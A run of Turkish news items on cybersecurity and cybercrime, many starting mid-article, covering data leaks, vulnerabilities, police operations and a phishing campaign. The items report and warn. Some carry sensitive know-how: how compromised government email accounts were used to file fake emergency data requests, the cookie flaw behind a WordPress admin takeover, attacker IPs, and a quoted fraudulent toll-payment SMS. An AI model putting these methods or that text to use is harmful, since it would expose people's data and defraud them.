Apple, söz konusu güvenlik açığını macOS 26.2 sürümünde yayımladığı güncellemeyle giderdi. Güncelleme kapsamında, com.apple.private.accessibility.scrod yetkisinin süreç denetim belirteci üzerinden doğrulanmasının zorunlu hale getirildiği, bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin kapatıldığı bildirildi.

Apple, macOS 26.2 güvenlik güncellemesine ilişkin teknik detayları resmi güvenlik bülteninde paylaştı. Kullanıcıların, Sistem Ayarları > Yazılım Güncelleme adımlarını izleyerek en son sürüme geçmeleri önerildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dark Web Forumunda Paylaşıldı
Dark Web Informer tarafından aktarılan bilgilere göre, sızdırıldığı iddia edilen veriler bir dark web forumunda satışa veya paylaşıma açıldı. Tehdit aktörü, ele geçirilen bilgilerin NordVPN’e ait Salesforce veritabanı içerikleri olduğunu savundu.

Brute Force ile Erişim İddiası
Paylaşımda, saldırganın yanlış yapılandırılmış bir NordVPN geliştirme sunucusunu brute force yöntemiyle ele geçirdiği ileri sürüldü. Bu sunucuda Salesforce ve Jira sistemlerine ait bilgilerin birlikte tutulduğu iddia edildi.

Sızdırıldığı Öne Sürülen Veriler
Dark Web Informer, tehdit aktörünün paylaştığını iddia ettiği örnekler üzerinden şu bilgilerin ele geçirildiğini bildirdi:
10’dan fazla veritabanı kaynak kodu, Salesforce API anahtarları, Jira erişim tokenları ve ek hassas teknik bilgiler.

SQL Dökümleri Paylaşıldı
Forumda yayınlanan örnek SQL dökümlerinde, “salesforce_api_step_details” ve “api_keys” tablolarına ait yapılar ile ayrıntılı veritabanı şema bilgilerinin yer aldığı öne sürüldü. Bu örneklerin, iddiaların gerçekliğini desteklemek amacıyla paylaşıldığı ifade edildi.

NordVPN’den Resmî Açıklama Bekleniyor
Sızıntı iddialarına ilişkin olarak NordVPN tarafından şu ana kadar kamuoyuna yansımış resmî bir açıklama bulunmuyor. Uzmanlar, iddiaların doğrulanması hâlinde bunun VPN hizmetlerine duyulan güven açısından önemli sonuçlar doğurabileceğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

20 Yıllık Açıklardan Güncel Zafiyetlere Kadar Tarama
Uzmanlar, saldırıların hem 20 yıla varan eski güvenlik açıklarını hem de 2023–2024 döneminde açıklanan kritik zafiyetleri hedef aldığını belirtti. ColdFusion’a odaklanan aşamada, 10’dan fazla kritik güvenlik açığının aktif biçimde istismar edilmeye çalışıldığı kaydedildi.

Saldırıların Zamanlaması Dikkat Çekti
Saldırı trafiğinin yüzde 68’inin Noel Günü gerçekleştiği bilgisi paylaşıldı. Araştırmacılar, bu zamanlamanın SOC ekiplerinin düşük kapasiteyle çalıştığı tatil dönemlerini bilinçli olarak hedef aldığını vurguladı.

Saldırı Kaynakları ve Teknikler
Analizlerde, saldırı trafiğinin büyük bölümünün 134.122.136.119 ve 134.122.136.96 IP adreslerinden geldiği tespit edildi. Kampanya kapsamında Interactsh ile out-of-band doğrulama, WDDX deserialization açıklarının istismarı ve JNDI/LDAP enjeksiyon saldırıları kullanıldı.

Öne Çıkan Güvenlik Açıkları
Saldırılarda en sık hedef alınan zafiyetler arasında CVE-2022-26134 (Confluence OGNL Injection) ve CVE-2014-6271 (Shellshock) yer aldı. Uzmanlar, ColdFusion’un bu kampanyanın yalnızca bir parçası olduğunu, saldırı yüzeyinin çok daha geniş olduğunu ifade etti.

Acil Önlem Çağrısı
Güvenlik ekiplerine, ilgili IP adreslerinin ve bağlantılı ASN’lerin engellenmesi, ColdFusion ve Java tabanlı altyapıların öncelikli olarak yamalanması ve özellikle tatil dönemlerine ait log kayıtlarının detaylı incelenmesi çağrısında bulunuldu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacılar tarafından paylaşılan teknik çalışmada, PWNSAT ile yer istasyonu arasındaki haberleşmenin pasif olarak dinlenmesi ayrıntılı biçimde belgelendi. Çalışmada, yazılım tabanlı radyo sistemleri kullanılarak uyduya ait telemetri ve telekomut sinyallerinin tespit edilmesi, yakalanması ve çözümlenmesi adım adım gösterildi.

Yazılım Tabanlı Radyo ile Dinleme Senaryosu
Araştırmada, gerçek dünyadaki bir dinleme saldırısını taklit eden bir laboratuvar ortamı kuruldu. Hedef olarak, donanımı, yazılımı ve yer istasyonu bileşenleriyle bilerek savunmasız bırakılan PWNSAT 0.1 FlatSat sistemi seçildi. RTL-SDR ve HackRF One cihazları ile açık kaynak yazılımlar kullanılarak, uydunun aşağı yönlü telemetri ve yukarı yönlü telekomut trafiği izlendi.

“Gizli Frekans Güvenli Değildir”
Spektrum taraması sonucunda, uydunun LoRa tabanlı haberleşme yaptığı 915 MHz ISM bandında belirgin sinyal patlamaları tespit edildi. Araştırmacılar, bu bulgunun “gizli frekans” yaklaşımının tek başına bir güvenlik önlemi olmadığını açık biçimde ortaya koyduğunu vurguladı.

Şifreleme Olmadan Aktarılan Veriler
Çalışmada, CCSDS Space Packet Protocol kullanan telemetri verilerinin uygulama katmanında şifrelenmemiş olması nedeniyle, ham radyo sinyallerinin anlamlı sensör verilerine dönüştürülebildiği gösterildi. BME280 ve MPU6050 sensörlerinden gelen çevresel ve hareket verilerinin gerçek zamanlı olarak çözümlenebildiği kaydedildi.

Gelecekteki Risklere Dikkat Çekildi
Araştırmacılar, pasif dinlemenin çoğu zaman son adım olmadığını belirterek, telemetri verilerinin ele geçirilmesinin uydunun çalışma döngülerini ve sağlık durumunu açığa çıkardığını ifade etti. Bu durumun, daha ileri mantıksal ya da fiziksel saldırılar için zemin hazırlayabileceği kaydedildi.

Paylaşılan çalışmada, tüm deneylerin eğitim ve araştırma amacıyla, kontrollü bir laboratuvar ortamında gerçekleştirildiği özellikle vurgulandı. Yetkisiz uydu haberleşmesi dinlemenin ulusal ve uluslararası hukuka aykırı olabileceği hatırlatıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

BreachForums’ta İlk Alarm
2024’ün başlarında “Tamagami” adlı bir tehdit aktörünün BreachForums’ta yaptığı paylaşım, sistemin nasıl istismar edildiğini gözler önüne serdi. Söz konusu paylaşımda, “Kodex Global hesabımı satıyorum. Binance veya Coinbase üzerinden EDR ile istediğiniz kişiyi sorgulayabilirsiniz.” ifadeleri yer aldı. İddialara göre tekil sorgu bedelleri 300 dolara, tam erişim ise 5 bin dolara kadar çıktı.

Hedefte Sosyal Ağlar ve Kripto Platformları
Araştırmalara göre Kodex üzerinden yapılan sahte acil talepler yalnızca kripto borsalarıyla sınırlı kalmadı. Discord, Tinder ve LinkedIn gibi sosyal platformların da listede yer aldığı, bu yolla kullanıcıların IP adresleri, telefon numaraları ve fiziksel adreslerinin elde edildiği kaydedildi.

Sistem Nasıl İstismar Ediliyor
Uzmanlar, Kodex altyapısının teknik olarak güvenli olduğunu ancak insan faktörünün zayıf halka haline geldiğini vurguladı. Sürecin, bilgi hırsızlığı zararlıları ve oltalama saldırılarıyla ele geçirilen .gov ve .police uzantılı e-posta hesaplarıyla başladığı aktarıldı. Bu adreslerle Kodex’e kayıt yapıldığı ve “hayati tehlike” veya “terör şüphesi” gibi gerekçelerle platformlardan veri talep edildiği ifade edildi.

“EDR as a Service” Dönemi
Şubat 2025 tarihli paylaşımlar, sahte Kodex hesaplarının fiyatlarının 400 dolara kadar düştüğünü gösterdi. Bu durumun, düşük profilli saldırganların da sistemi kullanabilir hale gelmesine yol açtığı bildirildi. Aralık 2025 itibarıyla bazı grupların, “doğrulanmış Avrupa devlet e-postalarıyla EDR geçeriz” şeklinde açık ilanlar verdiği kaydedildi.

Sanal Veriden Fiziksel Tehdide
Elde edilen adres ve iletişim bilgilerinin yalnızca ifşa için değil, fiziksel tehditler için de kullanıldığı belirtildi. Uzmanlar, saldırganların bu verilerle sahte bomba ihbarı veya rehine bildirimi yaparak polis ekiplerini hedef adreslere yönlendirdiğini, bu yöntemin geçmişte ABD’de ölümle sonuçlanan olaylara neden olduğunu hatırlattı.

APT Grupları ve Fidye Çeteleri de Kullanıyor
Analizlerde, Lapsus$ ve Scattered Spider gibi organize grupların yanı sıra devlet destekli APT yapılanmalarının da Kodex EDR’yi stratejik bir araç olarak gördüğü ifade edildi. Fidye gruplarının, şirket yöneticilerinin aile bireylerine ulaşarak baskıyı artırdığı; APT gruplarının ise diplomat, gazeteci ve muhalifleri zararlı yazılım kullanmadan izleyebildiği aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

59 İlde Eş Zamanlı Operasyon
Bakan Yerlikaya, Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde 59 il merkezli olarak gerçekleştirilen operasyonlarda çevrim içi çocuk müstehcenliği, yasa dışı bahis ve nitelikli dolandırıcılık suçlarına karıştıkları belirlenen şüphelilerin yakalandığını açıkladı.

190 Tutuklama, 111 Adli Kontrol Kararı
Yerlikaya’nın paylaştığı bilgilere göre, operasyonlarda gözaltına alınan 539 kişiden 190’ı tutuklanırken, 111 kişi hakkında adli kontrol hükümleri uygulandı. Diğer şüphelilerin işlemlerinin sürdüğü bildirildi.

Dolandırıcılık ve Yasa Dışı Bahis Ağı Çökertildi
Şüphelilerin, “ürün satışı, kiralık bungalov, sigorta ödemesi, evde iş ilanları, sosyal yardım bağışı” temalarını kullanarak vatandaşları dolandırdıkları, mobil bankacılık hesaplarına erişim sağlayarak haksız kazanç elde ettikleri ve yasa dışı bahis ile pos tefeciliği yaptıkları tespit edildi.

404 Milyon TL Değerinde Mal Varlığına El Konuldu
Yapılan çalışmalar sonucu yaklaşık 404 milyon TL değerinde 7 şirket, 3 konut ve 5 arsaya el konuldu. Şüpheliler hakkında ilgili Cumhuriyet Başsavcılıklarınca soruşturma başlatıldı.

“Vatandaşlarımız Dikkatli Olsun” Uyarısı
Bakan Yerlikaya, vatandaşlara internet ortamında dolandırıcılık girişimlerine karşı dikkatli olmaları çağrısında bulunarak, “Şüphelendiğiniz bir durumda 112 Acil Çağrı Merkezimizi arayın, biz gereğini yapalım.” ifadelerini kullandı. Yerlikaya, siber suçlarla mücadelenin kararlılıkla sürdürüleceğini kaydetti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sinop Merkezli 6 İlde Eş Zamanlı Operasyon
Boyabat Cumhuriyet Başsavcılığı koordinesinde, Jandarma Kaçakçılık ve Organize Suçlarla Mücadele (KOM) ile Siber Suçlarla Mücadele Daire Başkanlıkları tarafından yürütülen çalışmalar sonucu, Sinop merkezli İstanbul, Bursa, Düzce, Balıkesir ve Çorum’da eş zamanlı operasyonlar düzenlendi.

30 Şüpheli Tutuklandı
Operasyonlarda yakalanan 32 şüpheliden 30’u tutuklandı, 2’si hakkında ise adli kontrol hükümleri uygulandı. Şüphelilerin “Suç işlemek amacıyla örgüt kurma” ve 7258 sayılı Kanun’a muhalefet suçlarından işlem gördüğü bildirildi.

Milyonluk Hesap Hareketleri ve Mal Varlığına El Koyma
“Suçtan kaynaklanan malvarlığı değerlerinin aklanması” kapsamında, şüphelilere ait 5 araç ve 410 banka hesabına el konuldu. Operasyonla bağlantılı hesaplarda 524,5 milyon TL’lik yasa dışı para hareketi tespit edildi.

Yasa Dışı Bahis Siteleri Üzerinden Dolandırıcılık
Yapılan incelemelerde, şüphelilerin internet siteleri üzerinden yasa dışı bahis oynattıkları, reklam yoluyla haksız kazanç sağladıkları ve kullanıcı yönlendirmeleriyle vatandaşları dolandırdıkları belirlendi.

“Toplumun Geleceğini Tehdit Eden Suçlara Karşı Kararlıyız”
Bakan Yerlikaya, açıklamasında, “Yasa dışı bahis sadece bireylerin değil, toplumun geleceğini de tehdit eden bir suçtur. Vatandaşlarımızın güvenliği için yasa dışı bahis ve siber dolandırıcılıkla mücadelemize kararlılıkla devam ediyoruz.” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

17 İLDE EŞ ZAMANLI OPERASYONLAR
Yerlikaya, Adana, Adıyaman, Amasya, Bitlis, Düzce, Gaziantep, İstanbul, İzmir, Kayseri, Kocaeli, Nevşehir, Osmaniye, Sakarya, Sivas, Tekirdağ, Van ve Yalova merkezli gerçekleştirilen operasyonlarda çok sayıda kişinin gözaltına alındığını bildirdi.

83 KİŞİ TUTUKLANDI, 47’SİNE ADLİ KONTROL
Operasyonlarda 189 şüpheliden 83’ünün tutuklandığını, 47’si hakkında ise adli kontrol kararı verildiğini açıklayan Yerlikaya, diğer şüphelilerle ilgili işlemlerin sürdüğünü kaydetti.

DOLANDIRICILIK VE MÜSTEHCENLİK SUÇLARINA SIKI TAKİP
Soruşturmalarda şüphelilerin “ürün satışı, kiralık bungalov, yatırım ortaklığı” gibi temalarla vatandaşları dolandırdıkları, çocuk müstehcenliği içeren görüntüler bulundurdukları ve yasa dışı bahis faaliyetlerinde bulunduklarının belirlendiği ifade edildi. Ayrıca, bazı kişilerin mobil bankacılık hesaplarına erişim sağlayarak haksız kazanç elde ettikleri tespit edildi.

EGM VE MASAK KOORDİNASYONUNDA YÜRÜTÜLDÜ
Operasyonların Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinasyonunda, İl Emniyet Müdürlüklerinin ilgili birimleri tarafından yürütüldüğü bildirildi.

“SİBER VATAN’DA DA PEŞİNDEYİZ”
Ali Yerlikaya paylaşımında, “Vatandaşlarımızı dolandırmaya çalışanların Kara Vatan’da olduğu gibi Siber Vatan’da da sanal devriyelerimizle peşindeyiz.” ifadesini kullandı. Bakan Yerlikaya, şüpheli durumlarda vatandaşların 112 Acil Çağrı Merkezi’ni arayarak bilgi vermesini istedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

USOM, 2 Bin 374 Kurumla Koordineli Çalışıyor
Bakan Uraloğlu, Bilgi Teknolojileri ve İletişim Kurumu bünyesinde faaliyet gösteren Ulusal Siber Olaylara Müdahale Merkezinin (USOM) 14 sektörel SOME ve 2 bin 374 kurumsal SOME ile koordineli biçimde çalıştığını belirtti. “USOM, 8 bin 237 uzman personel ile ülkemizin siber olaylara müdahale kapasitesini güçlendiriyor.” ifadelerini kullandı.

Zararlı Bağlantılara Karşı Etkin Mücadele
Uraloğlu, ekim ayı itibarıyla 74 bin 594 zararlı bağlantının erişime engellendiğini ve 306 güvenlik bildiriminin kurumlarla paylaşıldığını açıkladı. “Yapay zeka teknolojisi ile vatandaşlarımızı dolandırmaya yönelik 74 bin 205 oltalama alan adını tespit ederek erişime kapattık. Sadece son bir haftada 502 bin 173 zararlı internet adresine 75,1 milyon erişim engeli uyguladık.” dedi.

Yerli Yazılımlar Güçlü Koruma Sağlıyor
USOM’un yerli ve milli yazılımları “Avcı, Azad, Kasırga, Atmaca ve Kule” sayesinde 17 milyon IP adresinde düzenli zafiyet taraması yaptığını kaydeden Uraloğlu, “USOM, yalnızca 7 saatte yaklaşık 242 bin 133 kritik web sitesini zafiyetlere karşı tarayabiliyor.” ifadesini kullandı.

18 Ulusal Hedef ve 61 Eylem Maddesiyle İlerleme
Bakan Uraloğlu, Ulusal Siber Güvenlik Stratejisi ve Eylem Planı (2024–2028) kapsamında 6 stratejik amaç belirlediklerini söyledi. “Siber dayanıklılık, proaktif savunma, caydırıcılık, insan odaklı güvenlik, yerli teknolojiler ve uluslararası marka hedefleri doğrultusunda 18 ulusal hedef ve 61 eylem maddesiyle ilerliyoruz.” diye konuştu.

5G İhalesi Dijital Dönüşümde Dönüm Noktası
Geçtiğimiz hafta tamamlanan 5G yetkilendirme ihalesine de değinen Uraloğlu, “İhalemiz 3 milyar 534 milyon dolarlık gelirle sonuçlandı. Bu başarı, iletişim altyapımıza ve Ar-Ge çalışmalarımıza ivme kazandıracaktır.” dedi.

Yeni Siber Güvenlik Kanunu Yürürlükte
Uraloğlu, 19 Mart 2025 tarihinde yürürlüğe giren Siber Güvenlik Kanunu ile Türkiye’nin siber uzaydaki ulusal çıkarlarını korumayı ve yerli-milli ekosistemi güçlendirmeyi hedeflediklerini belirtti. Ayrıca sosyal medya platformlarına yönelik yasal düzenlemelerin 5651 ve 7418 sayılı kanunlar çerçevesinde sürdüğünü hatırlattı.

Çocukların Dijital Güvenliği Öncelikli Konu
Bakan Uraloğlu, özellikle çocukların sosyal medyada korunmasının Bakanlığın öncelikleri arasında olduğunu ifade etti. “Yapay zekâ teknolojilerinin etkisiyle çocuklar dezenformasyona daha fazla maruz kalıyor. Bu nedenle 16 yaş altı kullanıcılar için sosyal medya düzenlemesi hazırlıyoruz.” açıklamasını yaptı.

“Türkiye, Rol Model Ülke”
Konuşmasının sonunda Uraloğlu, Uluslararası Telekomünikasyon Birliği’nin 2024 Küresel Siber Güvenlik Endeksi sonuçlarına atıfta bulunarak, “Türkiye, 100 tam puanla Seviye 1: Rol Model Ülke kategorisinde yer alıyor. Bu başarı, siber güvenlik alanında istikrarlı politikaların sonucudur.” değerlendirmesinde bulundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Cumhuriyet Başsavcılıkları Koordinesinde Operasyonlar Sürüyor”
Yerlikaya, operasyonların Cumhuriyet Başsavcılıkları, Emniyet Genel Müdürlüğü TEM Daire Başkanlığı, KOM ve İstihbarat Başkanlıkları koordinasyonunda sürdürüldüğünü belirtti. İl Emniyet Müdürlüklerine bağlı TEM ve KOM Şube Müdürlüklerinin yoğun çalışma yürüttüğü kaydedildi.

50 İlde Eş Zamanlı Operasyonlar
Operasyonların Adana, Afyonkarahisar, Aksaray, Ankara, Antalya, Aydın, Batman, Bingöl, Bursa, Çanakkale, Çorum, Denizli, Düzce, Edirne, Elazığ, Erzurum, Eskişehir, Gaziantep, Giresun, Gümüşhane, Hatay, Isparta, İstanbul, İzmir, Kahramanmaraş, Kars, Kayseri, Kırıkkale, Kocaeli, Konya, Kütahya, Malatya, Manisa, Mardin, Mersin, Muğla, Muş, Nevşehir, Niğde, Ordu, Osmaniye, Rize, Sakarya, Samsun, Sivas, Şanlıurfa, Tekirdağ, Tokat, Trabzon ve Zonguldak illerinde gerçekleştirildiği bildirildi.

“FETÖ’nün Güncel Yapılanmasına Darbe”
Bakan Yerlikaya’nın açıklamasına göre, yakalanan şüphelilerin terör örgütünün güncel, finans, askeri mahrem ve sivil mahrem yapılanmaları içinde faaliyet yürüttükleri tespit edildi. Şüphelilerin, örgütün kriptolu haberleşme programı ByLock’u kullandıkları ve ankesörlü telefonlar aracılığıyla örgüt içi iletişim kurdukları belirlendi.

Kesinleşmiş Cezası Olanlar da Yakalandı
Operasyonlarda ayrıca, FETÖ soruşturmaları kapsamında hakkında kesinleşmiş hapis cezası ve aranma kaydı bulunan kişilerin de yakalandığı ifade edildi. Bakan Yerlikaya, terörle mücadelede kararlılıkla hareket ettiklerini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

SMS’teki kısa bağlantıya tıklayan kullanıcı önce mobil tarayıcıda açılan sahte sayfaya yönlendiriliyor. Sayfa kullanıcıdan öncelikle cep telefonu numarasını girmesini istiyor. Telefon numarası girildikten sonra resimde görülen ödeme bölümü açılıyor; burada karttaki isim, kart numarası, son kullanma tarihi ve CVV kodu gibi bilgiler talep ediliyor. Sayfa, resmi kurum tasarımını andıran öğeler (örneğin KGM benzeri logo, “Elektronik geçiş ücretini çevrimiçi ödeyin” başlığı) kullanarak güven yaratmaya çalışıyor.

Siber güvenlik araştırmacısı ve haberci Ebubekir Bastama, yapılan incelemede sitenin yalnızca mobil cihazlarda açıldığını ve ilk aşamada telefon numarası istendiğini tespit ettiğini bildirdi. Bastama bulgularını Ulusal Siber Olaylara Müdahale Merkezi’ne (USOM) iletti.

Bu Sahte SMS Bastama tarafından eğitim verdiği bir vatandaş tarafından bildirilmesi ile tespit edilmiştir. Mesajda son ödeme tarihi 14 Ekim 2025 olarak gösteriliyor; gönderimler son günlere bırakılarak kullanıcıların acele etmesi amaçlanıyor. Benzer dolandırıcılık girişimleri yıl içinde farklı tarihlerle tekrar edilebiliyor.Site önce telefon numarası, sonra banka kartı bilgilerini talep ettiği için kullanıcı hakkında daha fazla sosyal mühendislik verisi toplanabiliyor. Kart bilgileri girildiğinde dolandırıcılar ödeme bilgilerini ele geçirip kötüye kullanabilir; ayrıca cihazlara zararlı yazılım yüklenme riski de bulunuyor.

SMS metni örneği şu şekilde bulunuyor:
"Değerli Araç Sahibi, Sistem kayıtlarına göre, HGS bakiyeniz yetersiz olduğundan aracınızın Otoyol geçiş ücreti ödenmemiştir. Cezalı duruma düşmemeniz için, lütfen 14 Ekim 2025 tarihine kadar ödemenizi tamamlayınız. Ödenmemiş Tutar: 795,00 TL Ödeme Bağlantısı: https:[//]kgminfo[.]cc/gv?qr=3urgOi"
Bağlantıya tıklayan mobil tarayıcıda ilk aşamada telefon numarası isteniyor; ardından kart bilgileri girilen sahte ödeme formu gösteriliyor. Site mobilde çalışacak şekilde tasarlandığı için masaüstünde kolayca gözden kaçabiliyor.

Resmi kurum isimleriyle gelen ancak doğrulanamayan mesajlara itibar edilmemeli. Uzmanlar şu adımları öneriyor:

• Gelen bağlantıya kesinlikle tıklanmaması ve mesajın silinmesi.

• Gönderen numaranın engellenmesi ve mobil operatöre bildirilmesi.

• Telefon numarası ve kart bilgisi girildiyse bankaya derhal başvurarak kartın bloke ettirilmesi.

Resmi kurumlar genellikle ödeme taleplerini SMS içindeki kısa bağlantılar aracılığıyla doğrudan talep etmez. Vatandaşların e-Devlet, banka mobil uygulamaları veya kurumların resmi internet siteleri üzerinden doğrulama yapması gerekiyor. Kısa URL’ler ve bilinmeyen alan adları içeren mesajlara dikkat edilmeli; SMS’teki link yerine kurumların resmi iletişim kanalları kullanılmalı. Mobil uygulama izinleri ve tarayıcı yönlendirmeleri konusunda temkinli olunmalı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İlk tespitlere göre olay, enerji depolama alanındaki lityum-iyon bataryalarda yaşanan arıza sonucu başladı. Yetkililer 384 batarya paketinin yanarak imha olduğunu, “termal kaçak” nedeniyle yangının hızla yayıldığını bildirdi.

709 kamu hizmeti etkilendi
Yangın sonrası 709 çevrimiçi kamu hizmeti geçici olarak durdu. Bunlar arasında kimlik doğrulama, dilekçe başvuruları, posta sistemleri ve idari modüller yer aldı. İlk günlerde yalnızca %10’u yeniden çalıştırılabildi. 10 Ekim 2025 itibarıyla 217 sistem (%30,6) yeniden devreye alındı.

Yedekleme eksikliği krizin boyutunu artırdı
Kayıpların büyük kısmı, G-Drive sisteminin harici yedekleme altyapısına sahip olmamasından kaynaklandı. Korea Joongang Daily’ye göre, sistem düşük öncelikli sınıflandırıldığı için harici yedekleme yatırımı yapılmamıştı. Bu nedenle verilerin kurtarılması mümkün olmadı.

Soruşturma pil kaynaklı senaryoya odaklandı
Polis ve teknik ekipler, yangının lityum-iyon bataryalardan kaynaklandığını doğrulamak için incelemelerini sürdürüyor. Batarya odalarındaki ısı sensörleri, enerji kesme sistemleri ve taşıma süreci üzerinde duruluyor.

Resmî tepkiler ve alınan önlemler
Cumhurbaşkanı Lee Jae-myung olayın ardından veri merkezini ziyaret ederek yedeklilik standartlarının güçlendirilmesi talimatını verdi. Kriz yönetim merkezi, hizmetlerin aşamalı olarak yeniden devreye alınacağını ve ikili (dual) sistem planlamasının başlatıldığını açıkladı.

Uzmanlara göre olay ders niteliğinde
Uzmanlar, “bulut sistemlerin fiziksel risklerden muaf olmadığı” vurgusunu yaptı. Çok bölgeli mimarilerin ve düzenli yedekleme testlerinin zorunlu hale getirilmesi gerektiği ifade edildi. Ayrıca, enerji depolama odalarında lityum-iyon bataryaların güvenlik protokollerinin gözden geçirilmesi istendi.

Zaman çizelgesi:

• 26 Eylül 2025: Yangın 20.15 civarında başladı, hızla yayıldı.

• 27 Eylül 2025: Yangın kontrol altına alındı.

• 1 Ekim 2025: G-Drive verilerinin kurtarılamadığı kesinleşti.

• 10 Ekim 2025: Kurtarma oranı %30,6’ya ulaştı.

Güney Kore Devlet Veri Merkezi Yangını: 858 TB kalıcı veri kaybı, 709 kamu sistemi etkilendi

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uzmanlara göre, zafiyet “service_finder_switch_back()” adlı fonksiyonun hatalı çalışmasından kaynaklanıyor. Bu fonksiyon, kullanıcı geçişlerinde “original_user_id” adlı çerezi kullanıyor ancak bu çerezde kimlik doğrulama kontrolü bulunmuyor. Saldırganlar bu çerezi manipüle ederek yönetici yetkilerine sahip hesaplara erişim sağlayabiliyor.

Siber güvenlik araştırmacıları, söz konusu açığın kötü niyetli kişilere içerik değiştirme, şifre güncelleme, zararlı kod ekleme veya siteyi oltalama ve kötü amaçlı yazılım kampanyalarında kullanma imkânı tanıdığını belirtiyor.

Etki Alanı ve Riskler
Açık, “Service Finder” temasının 6.0 sürümüne kadar olan tüm versiyonlarını etkiliyor. Tema güncel değilse, sistem üzerinde hiçbir eklenti olmasa bile site savunmasız durumda olabiliyor. Etkilenen sistemlerde izinsiz girişler, yeni kullanıcı hesaplarının oluşturulması ve yönetici panosunda olağandışı aktiviteler gözlemlenebiliyor.

Güvenlik raporlarına göre, saldırı girişimlerinde 5.189.221.98, 185.109.21.157, 192.121.16.196, 194.68.32.71 ve 178.125.204.198 IP adreslerinden gelen istekler tespit edildi. Ancak bu adreslerin kayıtlarında bulunmaması sistemin güvenli olduğu anlamına gelmiyor.

Alınması Gereken Önlemler
Uzmanlar, temanın 6.0 sonrası sürümüne geçilmesini, tüm kullanıcı hesaplarının ve yetkilerinin gözden geçirilmesini, güvenlik duvarı (WAF) veya Wordfence gibi eklentilerin aktif hale getirilmesini öneriyor. Ayrıca site trafiği ve çerez davranışlarının özellikle yönetici oturumlarında izlenmesi gerektiği vurgulanıyor.

Sistemin yedekten geri yüklenmesi planlanıyorsa, kullanılan yedeklerin temiz ve güvenilir bir kaynaktan alındığından emin olunması gerekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehdit Kapasitesi
Yetkililer, ele geçirilen sistemin dakikada 30 milyon SMS gönderebilecek büyüklükte olduğunu açıkladı. Ağın baz istasyonlarını devre dışı bırakma, 911 acil yardım hattına DDoS saldırısı düzenleme ve şifreli iletişim sağlama gibi işlevlere sahip olduğu belirtildi. Bu kapasitenin kamu güvenliğini ve diplomatik faaliyetleri doğrudan tehlikeye atabileceği vurgulandı.

BM Genel Kurulu Çevresinde Yoğunlaşma
Operasyonda tespit edilen cihazların büyük kısmı BM Genel Kurulu’nun yapıldığı bölge çevresinde bulundu. Bu durum, ağın uluslararası diplomatik etkinliği hedef aldığı ihtimalini güçlendirdi.

Ulus-Devlet ve Suç Örgütleri Bağlantısı
ABD’li yetkililer, adli incelemenin sürdüğünü ve ilk bulguların ulus-devlet destekli tehdit aktörleri ile organize suç grupları arasında bağlantıya işaret ettiğini duyurdu. Uzmanlara göre bu tür bir ağ casusluk, kritik altyapılara saldırı planlama ve gizli iletişim için kullanılabiliyor.

Fail Belirsizliğini Koruyor
Operasyon sonrası bazı çevrelerde Rusya, Çin ve İsrail’in adı geçse de, ABD yetkilileri herhangi bir ülkeyi resmi olarak işaret etmedi. Gizli Servis sözcüsü, “Henüz belirli bir devlet ya da örgütü suçlayacak delil yok” ifadesini kullandı.

ABD’nin Çok Katmanlı Önlemleri
Operasyona Gizli Servis’in yanı sıra FBI, İç Güvenlik Bakanlığı (DHS) ve New York polisinin de katıldığı bildirildi. BM Genel Kurulu boyunca şehirde üst düzey güvenlik protokolleri uygulandı.

Adli İnceleme Devam Ediyor
Ele geçirilen cihazlar üzerinde yapılan incelemeler, sistemin hangi ülke ya da örgütlerle bağlantılı olduğunu ve planlanan olası saldırıların boyutunu ortaya koyacak. Yetkililer, “Tehdit tam olarak ortadan kalkmış değil, soruşturma sürüyor” uyarısında bulundu.

ABD Gizli Servisi BM Genel Kurulu çevresinde 100 bin SIM kartlık gizli iletişim ağını çökertti

Kaynak: CUMHA - CUMHUR HABER AJANSI

Plex’in web sitesinde yapılan açıklamada, bir üçüncü tarafın veritabanındaki sınırlı sayıda kullanıcı verisine eriştiği ifade edildi. Ele geçirilen veriler arasında kullanıcıların e-posta adresleri, kullanıcı adları, güvenli şekilde şifrelenmiş parolaları ve kimlik doğrulama verilerinin bulunduğu aktarıldı.

Kullanıcılara çağrı
Şirket, tüm kullanıcılara parolalarını derhal değiştirmeleri yönünde uyarıda bulundu. Ayrıca güvenliğin artırılması için bağlı tüm cihazlardan çıkış yapılması ve iki faktörlü kimlik doğrulamanın etkinleştirilmesi gerektiği vurgulandı.

Veri güvenliği soru işaretleri
Plex, kullanıcı parolalarının güçlü şifreleme yöntemleriyle korunduğunu, ancak ihtiyati tedbir olarak tüm hesapların güncellenmesi gerektiğini açıkladı. Olayın ardından platformun güvenlik süreçlerini gözden geçirmeye başladığı bildirildi.

Kurum, Türkiye’de kullanılan tüm e-imzaların yalnızca BTK tarafından yetkilendirilen 8 Elektronik Sertifika Hizmet Sağlayıcı (ESHS) tarafından üretildiğini ve 5070 Sayılı Elektronik İmza Kanunu kapsamında denetlendiğini bildirdi.

"Veri havuzu bulunmamaktadır"
BTK, e-imza sisteminde kişisel verilerin kurum bünyesinde tutulmadığını, nitelikli elektronik sertifikaların yalnızca kullanıcıların USB cihazlarında bulunduğunu belirtti. Açıklamada, "Türkiye’de bulunan tüm e-imzalara ait bilgiler, BTK ya da e-Devlet kapısı dahil, toplu halde herhangi bir veri havuzunda barındırılmamaktadır." denildi.

Yanıltıcı bilgiye hapis cezası uyarısı
Kurum, siber güvenlik alanında yanıltıcı bilgi yaymanın panik ve endişe oluşturabileceğini hatırlatarak, bu tür eylemlerin 7545 sayılı Siber Güvenlik Kanunu kapsamında suç teşkil ettiğini duyurdu. Kanunun 16. maddesine göre gerçeğe aykırı siber saldırı veya veri sızıntısı iddiaları yayanlara 2 ila 5 yıl hapis cezası öngörülüyor.

Yasal süreç başlatıldı
